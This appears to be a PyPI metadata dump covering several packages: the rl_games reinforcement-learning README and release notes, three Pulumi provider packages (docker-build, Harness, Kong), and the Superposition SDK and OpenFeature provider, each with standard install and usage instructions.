| zero_rnn_on_done | False | True | If False RNN internal state is not reset (set to 0) when an environment is rest. Could improve training in some cases, for example when domain randomization is on |
| player | | | Player configuration block. |
| render | True | False | Render environment |
| deterministic | True | True | Use a deterministic policy (argmax or mu) or a stochastic one. |
| use_vecenv | True | False | Use vecenv to create environment for player |
| games_num | 200 | | Number of games to run in the player mode. |
| env_config | | | Env configuration block. It goes directly to the environment. This example is taken from the Atari wrapper. |
| skip | 4 | | Number of frames to skip |
| name | BreakoutNoFrameskip-v4 | | The exact name of an (Atari) gym env. This is just an example; the parameters depend on the training env. |
| evaluation | True | False | Enables the evaluation feature for inferencing while training. |
| update_checkpoint_freq | 100 | 100 | Frequency in number of steps to look for new checkpoints. |
| dir_to_monitor | | | Directory to search for checkpoints in during evaluation. |
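The batch-size relationship described in the table above can be sketched in a few lines of Python. This is only an illustration using the default values from the table, not code from the rl_games source:

```python
# Defaults from the config table above; num_agents is 1 for single-agent envs.
num_actors = 16
num_agents = 1
horizon_length = 4096
minibatch_size = 8192

# Total number of steps collected per update.
batch_size = num_actors * horizon_length * num_agents

# The total number of steps must be divisible by the minibatch size.
assert batch_size % minibatch_size == 0, "adjust minibatch_size or horizon_length"

print(f"{batch_size} steps -> {batch_size // minibatch_size} minibatches per mini-epoch")
```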
## Custom network example:
[simple test network](rl_games/envs/test_network.py)
This network takes a dictionary observation.
To register it, add the following to your `__init__.py`:
```python
from rl_games.envs.test_network import TestNetBuilder
from rl_games.algos_torch import model_builder
model_builder.register_network('testnet', TestNetBuilder)
```
[simple test environment](rl_games/envs/test/rnn_env.py)
[example environment](rl_games/envs/test/example_env.py)
Additional environment properties and functions supported:
| Field | Default Value | Description |
| -------------------------- | ------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| use_central_value | False | If True, the returned obs is expected to be a dict with 'obs' and 'state' keys. |
| value_size | 1 | Shape of the returned rewards. The network will support a multi-head value automatically. |
| concat_infos | False | Whether the default vecenv should convert a list of dicts into a dict of lists. Very useful if you want to use value_bootstrap; in this case the env must always return 'time_outs': True or False. |
| get_number_of_agents(self) | 1 | Returns number of agents in the environment |
| has_action_mask(self) | False | Returns True if the environment provides an invalid-action mask. |
| get_action_mask(self) | None | Returns action masks if has_action_mask is True. A good example is [SMAC Env](rl_games/envs/test/smac_env.py) |
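A minimal environment exposing these optional hooks might look like the sketch below. The class name, observation shape, and return values are purely illustrative, not taken from the rl_games source:

```python
class ToyEnv:
    """Illustrative env exposing the optional rl_games hooks described above."""
    use_central_value = False   # True -> obs must be a dict with 'obs' and 'state'
    value_size = 1              # >1 enables multi-head value automatically
    concat_infos = True         # needed with value_bootstrap: return 'time_outs' in info

    def get_number_of_agents(self):
        return 1

    def has_action_mask(self):
        return False

    def get_action_mask(self):
        return None             # only queried when has_action_mask() is True

    def reset(self):
        return [0.0, 0.0, 0.0, 0.0]

    def step(self, action):
        obs, reward, done = [0.0] * 4, 0.0, False
        # 'time_outs' lets value bootstrapping distinguish timeouts
        # from true terminations
        info = {'time_outs': False}
        return obs, reward, done, info
```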
## Release Notes
1.6.5
* Added torch.compile support with configurable modes. Provides 10-40% performance improvement. Requires torch 2.2 or newer.
* Default mode is `reduce-overhead` for balanced compilation time and runtime performance
* Configurable via `torch_compile` parameter in yaml configs (true/false/"default"/"reduce-overhead"/"max-autotune")
* Separate compilation modes for actor and central value networks
* See [torch.compile documentation](docs/TORCH_COMPILE.md) for detailed configuration and mode selection guidance
* Fixed critical bugs in asymmetric actor-critic (central_value) training:
* Fixed incorrect device reference in `update_lr()` method
* Fixed infinite loop when iterating over dataset
* Added proper `__iter__` method to `PPODataset` class
* Fixed variance calculation in `RunningMeanStd` to use population variance
* Fixed get_mean_std_with_masks function.
* Fixed missing central value optimizer state in checkpoint save/load
* Added myosuite support.
* Added auxiliary loss support.
* Update for tacsl release: CNN tower processing, critic weights loading and freezing.
* Fixed SAC input normalization.
* Fixed SAC agent summary writer to use configured directory instead of hardcoded 'runs/'
* Fixed default player config num_games value.
* Fixed applying minibatch size per env.
* Added concat_output support for RNN.
* SAC improvements:
* Fixed missing `gamma_tensor` initialization bug
* Removed hardcoded torch.compile decorators (now respects YAML config)
* Optimized tensor operations and removed unnecessary clones
* Environment wrapper fixes:
* Fixed tuple/list observation handling for compatibility with various gym environments
* Added proper numpy to torch tensor conversion in `cast_obs`
* Fixed missing gym import in envpool wrapper
* Ray integration improvements:
* Moved Ray import to lazy loading (only when RayVecEnv is used)
* Added configurable Ray initialization with `ray_config` parameter
* Added proper cleanup with `close()` method for Ray actors
* Default 1GB object store memory allocation
1.6.1
* Fixed a Central Value RNN bug which occurs when training a multi-agent environment.
* Added Deepmind Control PPO benchmark.
* Added a few more experimental ways to train value prediction (OneHot, TwoHot encoding and crossentropy loss instead of L2).
* The new methods have not shown an improvement yet and cannot be turned on from the yaml files. Once we find an env which trains better with them, they will be added to the config.
* Added shaped reward graph to the tensorboard.
* Fixed bug with SAC not saving weights with save_frequency.
* Added multi-node training support for GPU-accelerated training environments like Isaac Gym. No changes in training scripts are required. Thanks to @ankurhanda and @ArthurAllshire for assistance in implementation.
* Added an evaluation feature for inferencing during training. Checkpoints from the training process can be automatically picked up and updated in the inferencing process when enabled.
* Added get/set API for runtime update of rl training parameters. Thanks to @ArthurAllshire for the initial version of fast PBT code.
* Fixed SAC not loading weights properly.
* Removed Ray dependency for use cases it's not required.
* Added warning for using deprecated 'seq_len' instead of 'seq_length' in configs with RNN networks.
1.6.0
* Added an ONNX export colab example for discrete and continuous action spaces. For the continuous case, an LSTM policy example is provided as well.
* Improved RNNs training in continuous space, added option `zero_rnn_on_done`.
* Added NVIDIA CuLE support: https://github.com/NVlabs/cule
* Added player config override. Vecenv is used for inference.
* Fixed multi-gpu training with central value.
* Fixed the max_frames termination condition and its interaction with the linear learning rate: https://github.com/Denys88/rl_games/issues/212
* Fixed "deterministic" misspelling issue.
* Fixed Mujoco and Brax SAC configs.
* Fixed multiagent envs statistics reporting. Fixed Starcraft2 SMAC environments.
1.5.2
* Added observation normalization to the SAC.
* Returned back adaptive KL legacy mode.
1.5.1
* Fixed build package issue.
1.5.0
* Added wandb support.
* Added poetry support.
* Fixed various bugs.
* Fixed cnn input was not divided by 255 in case of the dictionary obs.
* Added more envpool mujoco and atari training examples. Some of the results: 15 min Mujoco humanoid training, 2 min atari pong.
* Added Brax and Mujoco colab training examples.
* Added 'seed' command line parameter. Will override seed in config in case it's > 0.
* Deprecated `horovod` in favor of `torch.distributed` ([#171](https://github.com/Denys88/rl_games/pull/171)).
1.4.0
* Added discord channel https://discord.gg/hnYRq7DsQh :)
* Added envpool support with a few Atari examples. Works 3-4x faster than ray.
* Added mujoco results. Much better than openai spinning up ppo results.
* Added tcnn(https://github.com/NVlabs/tiny-cuda-nn) support. Reduces 5-10% of training time in the IsaacGym envs.
* Various fixes and improvements.
1.3.2
* Added a 'sigma' command line parameter. Will override sigma for continuous space if fixed_sigma is True.
1.3.1
* Fixed SAC not working
1.3.0
* Simplified the RNN implementation. Works a little bit slower but is much more stable.
* Now central value can be non-rnn if policy is rnn.
* Removed load_checkpoint from the yaml file. Now `--checkpoint` works for both train and play.
1.2.0
* Added Swish (SILU) and GELU activations, it can improve Isaac Gym results for some of the envs.
* Removed tensorflow and made initial cleanup of the old/unused code.
* Simplified runner.
* Now networks are created in the algos with load_network method.
1.1.4
* Fixed a crash in play (test) mode in the player when the simulation and rl devices are not the same.
* Fixed various multi-GPU errors.
1.1.3
* Fixed crash when running single Isaac Gym environment in a play (test) mode.
* Added config parameter ```clip_actions``` for switching off internal action clipping and rescaling
1.1.0
* Added to pypi: ```pip install rl-games```
* Added reporting env (sim) step fps, without policy inference. Improved naming.
* Renames in yaml config for better readability: steps_num to horizon_length and lr_threshold to kl_threshold.
## Troubleshooting
* Some of the supported envs are not installed with setup.py; you need to install them manually.
* Starting from rl-games 1.1.0 old yaml configs won't be compatible with the new version:
* ```steps_num``` should be changed to ```horizon_length``` and ```lr_threshold``` to ```kl_threshold```
## Known issues
* Running a single environment with Isaac Gym can cause a crash; if it happens, switch to at least 2 environments simulated in parallel.
| text/markdown | Denys Makoviichuk | trrrrr97@gmail.com | null | null | MIT | null | [
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14"
] | [] | null | null | >=3.8.0 | [] | [] | [] | [
"AutoROM[accept-rom-license]<0.5.0,>=0.4.2; extra == \"atari\"",
"PyYAML<7.0,>=6.0",
"ale-py<0.8,>=0.7; extra == \"atari\"",
"brax<0.0.14,>=0.0.13; extra == \"brax\"",
"envpool<0.7.0,>=0.6.1; extra == \"envpool\"",
"gym<0.24,>=0.23; python_version < \"3.9\"",
"gymnasium[classic-control]>=0.29.1; python_version >= \"3.9\"",
"gymnasium[classic-control]<0.30,>=0.29.1; python_version < \"3.9\"",
"jax<0.4.0,>=0.3.13; extra == \"brax\"",
"mujoco-py<3.0.0,>=2.1.2; extra == \"mujoco\"",
"psutil<6.0.0,>=5.9.0",
"setproctitle<2.0.0,>=1.2.2",
"tensorboard<3.0.0,>=2.8.0",
"tensorboardX<3.0,>=2.5",
"torch>=2.2.2; python_version >= \"3.9\"",
"torch<2.5.0,>=2.2.2; python_version < \"3.9\"",
"wandb>=0.19.0; extra == \"wandb\"",
"watchdog>=2.1.9"
] | [] | [] | [] | [
"Homepage, https://github.com/Denys88/rl_games",
"Repository, https://github.com/Denys88/rl_games"
] | twine/6.2.0 CPython/3.10.19 | 2026-02-20T06:19:25.942971 | rl_games-1.6.5.tar.gz | 127,456 | ec/d7/000cdc47df374943cdbb56b14ec4294ae06488cfdbe3633e69bc08359cf2/rl_games-1.6.5.tar.gz | source | sdist | null | false | b5b390a4c1b51902d2c2fcae5d787481 | e1e6cf55f2446592c50e93a89c04da65631ecd574b133fc2afa2c0d57f92968d | ecd7000cdc47df374943cdbb56b14ec4294ae06488cfdbe3633e69bc08359cf2 | null | [
"LICENSE"
] | 327 |
2.4 | pulumi-docker-build | 0.1.0a1771567048 | A Pulumi provider for building modern Docker images with buildx and BuildKit. | [](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/docker-build)
[](https://pypi.org/project/pulumi-docker-build)
[](https://badge.fury.io/nu/pulumi.dockerbuild)
[](https://pkg.go.dev/github.com/pulumi/pulumi-docker-build/sdk/go)
[](https://github.com/pulumi/pulumi-docker-build/blob/main/LICENSE)
# Docker-Build Resource Provider
A [Pulumi](http://pulumi.com) provider for building modern Docker images with [buildx](https://docs.docker.com/build/architecture/) and [BuildKit](https://docs.docker.com/build/buildkit/).
Not to be confused with the earlier
[Docker](http://github.com/pulumi/pulumi-docker) provider, which is still
appropriate for managing resources unrelated to building images.
| Provider | Use cases |
| ---------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------- |
| `@pulumi/docker-build` | Anything related to building images with `docker build`. |
| `@pulumi/docker` | Everything else -- including running containers and creating networks. |
## Reference
For more information, including examples and migration guidance, please see the Docker-Build provider's detailed [API documentation](https://www.pulumi.com/registry/packages/docker-build/).
| text/markdown | null | null | null | null | Apache-2.0 | docker, buildkit, buildx, kind/native | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.com",
"Repository, https://github.com/pulumi/pulumi-docker-build"
] | twine/5.0.0 CPython/3.11.8 | 2026-02-20T06:18:04.471479 | pulumi_docker_build-0.1.0a1771567048.tar.gz | 38,719 | c5/23/b4447b5b5e541424174aea65b8d52f269efc63d989177364b0c0bcf3b139/pulumi_docker_build-0.1.0a1771567048.tar.gz | source | sdist | null | false | a170dcd312941f7fccd172c5143d53a0 | 0fb8e405a009b9dfa134dd83e2933512f384c93e449cc8a7ad383b0b6f5c2422 | c523b4447b5b5e541424174aea65b8d52f269efc63d989177364b0c0bcf3b139 | null | [] | 197 |
2.4 | pulumi-harness | 0.12.0a1771567606 | A Pulumi package for creating and managing Harness resources. |
# Harness Resource Provider
The Harness resource provider for Pulumi lets you create resources in [Harness](https://www.harness.io). To use
this package, please [install the Pulumi CLI first](https://pulumi.com/).
## Installing
This package is available in many languages in standard packaging formats.
### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
```
$ npm install @pulumi/harness
```
or `yarn`:
```
$ yarn add @pulumi/harness
```
### Python
To use from Python, install using `pip`:
```
$ pip install pulumi-harness
```
### Go
To use from Go, use `go get` to grab the latest version of the library
```
$ go get github.com/pulumi/pulumi-harness/sdk/go/...
```
### .NET
To use from Dotnet, use `dotnet add package` to install into your project. You must specify the version if it is a pre-release version.
```
$ dotnet add package Pulumi.Harness
```
## Reference
See the Pulumi registry for API docs:
https://www.pulumi.com/registry/packages/Harness/api-docs/
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, harness | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://www.pulumi.com",
"Repository, https://github.com/pulumi/pulumi-harness"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:17:27.459052 | pulumi_harness-0.12.0a1771567606.tar.gz | 1,720,274 | b5/d5/b4e62c06c39b70f123fdb27c24b0c9d881fec38001d8a7906986c089ca02/pulumi_harness-0.12.0a1771567606.tar.gz | source | sdist | null | false | d1098335a64ac46372b0f246ba452987 | 8195de7b3c8f7d1082699bce71e07158ce01fb224caecc3aee2801b2c2e4c421 | b5d5b4e62c06c39b70f123fdb27c24b0c9d881fec38001d8a7906986c089ca02 | null | [] | 198 |
2.4 | pulumi-kong | 4.6.0a1771567807 | A Pulumi package for creating and managing Kong resources. | [](https://github.com/pulumi/pulumi-kong/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/kong)
[](https://pypi.org/project/pulumi-kong)
[](https://badge.fury.io/nu/pulumi.kong)
[](https://pkg.go.dev/github.com/pulumi/pulumi-kong/sdk/v3/go)
[](https://github.com/pulumi/pulumi-kong/blob/master/LICENSE)
# Kong Resource Provider
The Kong resource provider for Pulumi lets you manage Kong resources in your cloud programs. To use
this package, please [install the Pulumi CLI first](https://www.pulumi.com/).
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/kong
or `yarn`:
$ yarn add @pulumi/kong
### Python
To use from Python, install using `pip`:
$ pip install pulumi_kong
### Go
To use from Go, use `go get` to grab the latest version of the library
$ go get github.com/pulumi/pulumi-kong/sdk/v4
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Kong
## Configuration
The following configuration points are available:
- `kong:kongAdminUri` - The url of the kong admin api. May be set via the `KONG_ADMIN_ADDR` environment variable. Defaults to `http://localhost:8001`.
- `kong:kongAdminUsername` - Username for the kong admin api. May be set via the `KONG_ADMIN_USERNAME` environment variable.
- `kong:kongAdminPassword` - Password for the kong admin api. May be set via the `KONG_ADMIN_PASSWORD` environment variable.
- `kong:tlsSkipVerify` - Whether to skip tls certificate verification for the kong api when using https. May be set via the `TLS_SKIP_VERIFY` environment variable. Defaults to `false`.
- `kong:kongApiKey` - API key used to secure the kong admin API. May be set via the `KONG_API_KEY` environment variable.
- `kong:kongAdminToken` - API key used to secure the kong admin API in the Enterprise Edition. May be set via the `KONG_ADMIN_TOKEN` environment variable.
- `kong:strictPluginsMatch` - Should plugins `config_json` field strictly match plugin configuration. May be set via the `STRICT_PLUGINS_MATCH` environment variable. Defaults to `false`.
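These configuration points can be set either through the Pulumi CLI or through the environment variables listed above. A sketch for a hypothetical stack; the values are placeholders:

```shell
# Point the provider at a local Kong admin API.
pulumi config set kong:kongAdminUri http://localhost:8001
# Store the Enterprise admin token as an encrypted secret.
pulumi config set --secret kong:kongAdminToken <admin-token>

# Or equivalently via environment variables:
export KONG_ADMIN_ADDR=http://localhost:8001
export KONG_ADMIN_TOKEN=<admin-token>
```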
## Reference
For further information, please visit [the Kong provider docs](https://www.pulumi.com/docs/intro/cloud-providers/kong) or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/kong).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, kong | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-kong"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:17:04.037355 | pulumi_kong-4.6.0a1771567807.tar.gz | 35,995 | b0/bb/135cee98146819d72d696b7092c81cca4d96084e77c4eef1dc4973094118/pulumi_kong-4.6.0a1771567807.tar.gz | source | sdist | null | false | 19acd690341f32d0e78b8d8be4913df1 | d8e437b5992814fb98a01bbfc092f4ac5b139c09a045842456616d3a157e5a1b | b0bb135cee98146819d72d696b7092c81cca4d96084e77c4eef1dc4973094118 | null | [] | 214 |
2.4 | superposition-sdk | 0.99.2 | superposition_sdk client | # Superposition SDK
Superposition SDK is a Python client for the Superposition platform, designed to facilitate programmatic integration of all Superposition's API capabilities in Python applications. Read the complete documentation at [Superposition SDK Documentation](https://juspay.io/superposition/docs).
## Installation
Install the Superposition SDK using pip:
```bash
pip install superposition-sdk
```
## Initialization
```python
from superposition_sdk.client import Config, Superposition
client = Superposition(Config(endpoint_uri="http://localhost:8080"))
```
## Usage
The SDK provides commands for every API call that Superposition supports. Below is an example of how to use the SDK to list default configs.
```python
import asyncio
from superposition_sdk.client import Config, ListDefaultConfigsInput, Superposition
from pprint import pprint
async def list_configs():
client = Superposition(Config(endpoint_uri="http://localhost:8080"))
list_configs = ListDefaultConfigsInput(workspace_id="upi", org_id="orgid162145664241766405", all=True)
response = await client.list_default_configs(list_configs)
pprint(response)
asyncio.run(list_configs())
``` | text/markdown | null | null | null | null | Apache-2.0 | smithy, superposition_sdk | [
"Development Status :: 2 - Pre-Alpha",
"Intended Audience :: Developers",
"Intended Audience :: System Administrators",
"License :: OSI Approved :: Apache Software License",
"Natural Language :: English",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13"
] | [] | null | null | >=3.12 | [] | [] | [] | [
"smithy-core==0.0.1",
"smithy-http[aiohttp]==0.0.1",
"smithy-json==0.0.1",
"pydata-sphinx-theme>=0.16.1; extra == \"docs\"",
"sphinx>=8.2.3; extra == \"docs\"",
"pytest-asyncio<0.21.0,>=0.20.3; extra == \"tests\"",
"pytest<8.0.0,>=7.2.0; extra == \"tests\""
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.12.12 | 2026-02-20T06:16:41.957000 | superposition_sdk-0.99.2-py3-none-any.whl | 93,355 | f1/90/7f8ba82f1d8554fc83b73ae4b66928ad3595413432a9b9a294370d603b17/superposition_sdk-0.99.2-py3-none-any.whl | py3 | bdist_wheel | null | false | 302ff82973bfc80430e5e60d7fe0121e | 0ab0fd2ac9ab2b7d572b524af1b2d72b0dbe8f4250c72f570bb71d3878ebb541 | f1907f8ba82f1d8554fc83b73ae4b66928ad3595413432a9b9a294370d603b17 | null | [] | 88 |
2.4 | superposition-provider | 0.99.2 | superposition_provider | # Superposition Provider
Superposition provider is an openfeature provider that works with [Superposition](https://juspay.io/open-source/superposition) to fetch feature flags, configurations, and experiment variants from a Superposition server, store it in-memory and do configuration resolutions based on dynamic contexts. Read the [docs](https://juspay.io/open-source/superposition/docs) for more details.
### Installation
Install the provider
```bash
pip install openfeature-sdk
pip install superposition-provider
```
> **Note:** You will need to boot up Superposition before running the client code. Check the docs on how to get started with Superposition.
## Initialization
To initialize the Superposition provider, you need to create a configuration. Create the provider object and then, you can set the provider using OpenFeature's API.
```python
from openfeature import api
from superposition_provider.provider import SuperpositionProvider
from superposition_provider.types import ExperimentationOptions, SuperpositionProviderOptions, PollingStrategy
config_options = SuperpositionProviderOptions(
endpoint="http://localhost:8080",
token="api-token",
org_id="localorg",
workspace_id="test",
refresh_strategy=PollingStrategy(
interval=5, # Poll every 5 seconds
timeout=3 # Timeout after 3 seconds
),
fallback_config=None,
evaluation_cache_options=None,
experimentation_options=ExperimentationOptions(
refresh_strategy=PollingStrategy(
interval=5, # Poll every 5 seconds
timeout=3 # Timeout after 3 seconds
)
)
)
provider = SuperpositionProvider(provider_options=config_options)
# Initialize provider
await provider.initialize(context=ctx)
api.set_provider(provider)
```
## Usage
Once the provider is initialized, you can evaluate feature flags and configurations using the OpenFeature client.
```python
client = api.get_client()
ctx = EvaluationContext(
targeting_key="25", # Using a targeting key for experiment variant decider
attributes={'d1': 'd1'}
)
bool_val = client.get_boolean_details(
flag_key="bool",
default_value=True,
evaluation_context=ctx
)
# Note: If you want the whole config, you can directly use the provider itself
resp = provider.resolve_all_config_details({}, ctx)
print(f"Response for all config: {resp}")
print("Successfully resolved boolean flag details:", bool_val)
```
| text/markdown | null | null | null | null | Apache-2.0 | openfeature, superposition_provider | [] | [] | null | null | >=3.12 | [] | [] | [] | [
"smithy-core==0.0.1",
"smithy-http[aiohttp]==0.0.1",
"smithy-json==0.0.1"
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.12.12 | 2026-02-20T06:16:40.015593 | superposition_provider-0.99.2-py3-none-any.whl | 12,099,302 | 9d/49/520cb561dde6cf5f1354f211653dce49020bc121e212332d42f595806189/superposition_provider-0.99.2-py3-none-any.whl | py3 | bdist_wheel | null | false | f0e3acb1494decee301ccccbbc5f7a78 | 55da97078081f19542c7473852da72a05a1c3e5bd853752731b2fbae3ca13440 | 9d49520cb561dde6cf5f1354f211653dce49020bc121e212332d42f595806189 | null | [] | 89 |